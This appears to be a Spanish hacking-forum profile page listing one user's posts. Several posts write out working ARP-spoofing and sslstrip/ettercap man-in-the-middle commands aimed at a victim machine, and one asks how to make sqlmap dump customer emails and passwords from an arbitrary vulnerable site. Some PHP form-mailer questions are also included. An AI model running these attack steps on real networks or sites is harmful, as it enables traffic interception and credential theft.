elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Sigue las noticias más importantes de seguridad informática en el Twitter! de elhacker.NET


  Mostrar Mensajes
Páginas: [1] 2
1  Seguridad Informática / Hacking / Re: Universidad Hacking. Todo en Ciberseguridad. De 0 a Experto. en: 23 Noviembre 2021, 07:57 am
Buenos días,

Parece muy interesante el curso pero enlace está caído, podrían corregirlo?
Gracias.
2  Seguridad Informática / Hacking / Sqlmap en: 23 Noviembre 2021, 07:20 am
Buenas, tengo una duda y me gustaría que me pudiesen ayudar.
Imaginemos que encontramos una web cualquiera vulnerable a ataque boleano o sea a ciegas de una tabla clientes, ahora imaginemos que nos da email y pasword, y dumpeo la info bien imaginemos  que al dumpear salen 15.000 registros obviamente al ser ataque boleano 15.000 registros va a tardar una vida entera, así que mi pregunta es, puedo sacar solo los últimos 500 registros?, se que con havij si puedo hacer esto pero con sqlmap no se como hacerlo, muchas gracias.
3  Programación / PHP / Consulta PHP en: 23 Febrero 2014, 22:21 pm
Hola a todos, tengo una web con un formulario estandar con lo tipico nombre telefono direccion codigo postal... etc y quisiera que los datos del formulario se quedaran grabados en un fichero txt, es esto posible y si es asi como puedo hacerlo, gracias
4  Programación / PHP / Re: Ayuda con PHP en: 22 Febrero 2014, 08:21 am
Si he entendido bien deberia ser asi... el form:

**********************************************************************

<form class="contact_form" action="envia_form_php.php" method=post>

<ul>

  <li>

      <h3>Realizar proceso</h3>

  </li>

<li>
   <label for="name">Nombre:</label>
   
   <input id="name" name="name" type="text" placeholder="Ricardo" required />
</li>

<li>


   <label for="last_name">Apellidos:</label>
   
   <input id="last_name" name="last_name" type="text" placeholder="Garcia Martin" required />


</li>
<li>


   <label for="address":>Dirección:</label>

   <input id="addres" name="address" type="text" placeholder="calle sant joan 36" required />

</li>
<li>


   <label for="mail":>Email:</label>
   
   <input id="mail" name="mail" type="text" placeholder="ejemplo@ejemplo.com" required />

</li>
<li>


   <label for="country":>Pais:</label>

   <input id="country" name="country" type="text" placeholder="España" required />

</li>
<li>



   <label for="city":>Ciudad:</label>

   <input id="city" name="city" type="text" placeholder="Barcelona" required />

</li>
<li>



   <label for="zip_code":>Zip:</label>

   <input id="zip_code" name="zip_code" type="text" placeholder="" required />



</li>
 <li>
    
    
     <button class=""submit" type="submit">Pagar</button>
    
</li>
</ul>


</form>



*********************************************************************


************************El PHP****************************************

<?

if (!$_POST_VARS){

?>

<?

}else{

    //Estoy recibiendo el formulario, compongo el cuerpo

    $cuerpo = "En proceso\n";

    $cuerpo .= "Nombre: " . $_POST_VARS["name"] . "\n";

    $cuerpo .= "Apellidos: " . $_POST_VARS["last_name"] . "\n";

    $cuerpo .= "Dirección: " . $_POST_VARS["address"] . "\n";

    $cuerpo .= "Email: " . $_POST_VARS["email"] . "\n";

    $cuerpo .= "Pais: " . $_POST_VARS["country"] . "\n";

    $cuerpo .= "Ciudad: " . $_POST_VARS["city"] . "\n";

    $cuerpo .= "Zip: " . $_POST_VARS["zip_code"] . "\n";

 //mando el correo...

    mail("gutierrezgalvezalejandro@gmail.com","Formulario recibido",$cuerpo);

    //doy las gracias por el envío

    echo "Proceso realizado con exito

*********************************************************************

aun asi no recibo el mail, no entiendo mucho de php por no decir nada si me pudieras ayudar te lo agradeceria , muchas gracias.
5  Programación / PHP / Ayuda con PHP en: 21 Febrero 2014, 14:12 pm
hola a todos, expongo el tema.

tengo una web en la que he creado un formulario html que llama al archivo envia_form_php.php,pero no recibo ningun mail, el formulario es el siguiente:

Código
  1. <form class="contact_form" action="envia_form_php.php" method=post>
  2.  
  3. <ul>
  4.  
  5.  <li>
  6.  
  7. <h3>Realizar proceso</h3>
  8.  
  9.  </li>
  10.  
  11. <li>
  12. <label for="name">Nombre:</label>
  13.  
  14. <input id="name" type="text" placeholder="Ricardo" required />
  15. </li>
  16.  
  17. <li>
  18.  
  19.  
  20. <label for="last_name">Apellidos:</label>
  21.  
  22. <input id="last_name" type="text" placeholder="Garcia Martin" required />
  23.  
  24.  
  25. </li>
  26. <li>
  27.  
  28.  
  29. <label for="address":>Dirección:</label>
  30.  
  31. <input id="address" type="text" placeholder="calle sant joan 36" required />
  32.  
  33. </li>
  34. <li>
  35.  
  36.  
  37. <label for="mail":>Email:</label>
  38.  
  39. <input id="mail" type="text" placeholder="ejemplo@ejemplo.com" required />
  40.  
  41. </li>
  42. <li>
  43.  
  44.  
  45. <label for="country":>Pais:</label>
  46.  
  47. <input id="country" type="text" placeholder="España" required />
  48.  
  49. </li>
  50. <li>
  51.  
  52.  
  53.  
  54. <label for="city":>Ciudad:</label>
  55.  
  56. <input id="city" type="text" placeholder="Barcelona" required />
  57.  
  58. </li>
  59. <li>
  60.  
  61.  
  62.  
  63. <label for="zip_code":>Zip:</label>
  64.  
  65. <input id="zip_code" type="text" placeholder="" required />
  66.  
  67.  
  68.  
  69. </li>
  70. <li>
  71.  
  72.  
  73.  <button class=""submit" type="submit">Pagar</button>
  74.  
  75. </li>
  76. </ul>
  77.  
  78.  
  79. </form>



Ahora tengo en el archivo envia_php.php lo siguiente:


Código
  1. <?
  2.  
  3. if (!$HTTP_POST_VARS){
  4.  
  5. ?>
  6.  
  7. <?
  8.  
  9. }else{
  10.  
  11.    //Estoy recibiendo el formulario, compongo el cuerpo
  12.  
  13.    $cuerpo = "En proceso\n";
  14.  
  15.    $cuerpo .= "Nombre: " . $HTTP_POST_VARS["name"] . "\n";
  16.  
  17.    $cuerpo .= "Apellidos: " . $HTTP_POST_VARS["last name"] . "\n";
  18.  
  19.    $cuerpo .= "Dirección: " . $HTTP_POST_VARS["address"] . "\n";
  20.  
  21.    $cuerpo .= "Email: " . $HTTP_POST_VARS["email"] . "\n";
  22.  
  23.    $cuerpo .= "Pais: " . $HTTP_POST_VARS["country"] . "\n";
  24.  
  25.    $cuerpo .= "Ciudad: " . $HTTP_POST_VARS["city"] . "\n";
  26.  
  27.    $cuerpo .= "Zip: " . $HTTP_POST_VARS["zip code"] . "\n";
  28.  
  29.  
  30.  
  31.    //mando el correo...
  32.  
  33.    mail("gutierrezgalvezalejandro@gmail.com","Formulario recibido",$cuerpo);
  34.  
  35.    //doy las gracias por el envío
  36.  
  37.    echo "Proceso realizado con exito.";
  38. }
  39. ?>

que es lo que estoy haciendo mal y como puedo solucionarlo?, gracias a todos y un saludo.

MOD: Utilizar etiquetas [code][/code], dudas de PHP en el subforo de PHP. Leer reglas -> Normas del subforo de Desarrollo Web & Normas del subforo de PHP
6  Foros Generales / Dudas Generales / Re: problema ettercap en: 26 Noviembre 2013, 23:42 pm
Bueno ya resolvi el problema a medias jejeje.

Lo que he hecho es redirigir las iptables al puerto 1881 y lanzar el sslstrip desde la shell y el ettercap lo que hice ha sido lanzarlo de forma grafica ettercap gtk 0.8.0 y de esta manera si que me hace el ataque.

La ultima duda que me surje es si puedo lanzar este mismo ataque a varios pc victima que esten conectados a la misma red por medio del ettercap gtk que es como puedo hacerlo yo, ¿es posible? ¿y si lo es como se haria?.

gracias.
7  Foros Generales / Dudas Generales / Re: problema ettercap en: 26 Noviembre 2013, 22:32 pm
Sigo con los problemas esta vez en arpspoof hago lo siguiente...

echo "1" > /proc/sys/net/ipv4/ip_forward

arpspoof -i interfaz_red -t ip_victima ip_router




En otra shell

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1881

Arranco el sslstrip y digo que me haga un fichero donde guardar los datos

sslstrip -w (nombre archivo)



En otra shell

tail -f nombre archivo (para ver el fichero en vivo y directo)


Ahora cojo el pc victima y....
chaaaaannnn no me va internet a menos de que ponga manualmente "https" esto en chrome y lo mismo para mozilla.

Algún consejo?




Me retracto, internet si que tengo lo que no puedo es abrir ninguna pagina que vaya por hhtps ya que el ataque me esta quitando la "s" y me dice pagina no disponible, si le pongo el https manualmente si que puedo verla...
8  Foros Generales / Dudas Generales / Re: problema ettercap en: 26 Noviembre 2013, 22:23 pm
Sigo con los problemas esta vez en arpspoof hago lo siguiente...

echo "1" > /proc/sys/net/ipv4/ip_forward

arpspoof -i interfaz_red -t ip_victima ip_router




En otra shell

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1881

Arranco el sslstrip y digo que me haga un fichero donde guardar los datos

sslstrip -w (nombre archivo)



En otra shell

tail -f nombre archivo (para ver el fichero en vivo y directo)


Ahora cojo el pc victima y....
chaaaaannnn no me va internet a menos de que ponga manualmente "https" esto en chrome y lo mismo para mozilla.

Algún consejo?
9  Foros Generales / Dudas Generales / Re: problema ettercap en: 26 Noviembre 2013, 21:54 pm
He buscado y no encontre ninguna solución, nunca me tope con este problema sin embargo hasta que no encuentres una solución puedes usar arpspoof ne vez de ettercap para el spoofing, saludos.

Si pones los datos también pasaba lo mismo, no?

PD:Tenias permisos de admin o sudo?

Si, aun poniendo los parametros decia lo mismo
con los live de linux lo normal es que seas root, pero bueno seguire tu consejo de hacerlo con arpspoof mientras veo como lo resuelvo, si alguien sabe como solucionar el problema que lo ponga please.

un saludo
10  Foros Generales / Dudas Generales / problema ettercap en: 26 Noviembre 2013, 21:08 pm
Hola a todos,

estoy realizando pruebas en una lan para realizar un ataque sslstrip y ettercap.
lo primero que hago es poner el modo ip forward

echo 1 > /proc/sys/net/ipv4/ip_forward

luego redirijo el trafico de red del puerto 80 al puerto 1881 por ejemplo

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1881

hago correr el sslstrip

sslstrip -f -l 1881

hasta aquí bien, ahora vamos con el ettercap...

ettercap -T -q -i Wlan0 -M arp:remote // //

no pongo parametros para que me agregue toda la red q haya aunque tambien lo he probado poniendo la ip del pc victima y la del router el resultado fue el mismo.


he aquí el problema...

target (2 host)

0 host added to the list FATAL : ARP poisoning needs a non empty host list


Alguien sabe por que me dice esto y como puedo solucionarlo?

para mas información diré que en mi red tengo un sobremesa conectado por cable
un portatil conectado por wifi y otro portatil que es de donde lanzo el ataque con un adaptador de red alfa y de sistema es un live de linux.

Muchas gracias a todos por vuestra ayuda.

Un saludo.





Páginas: [1] 2
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines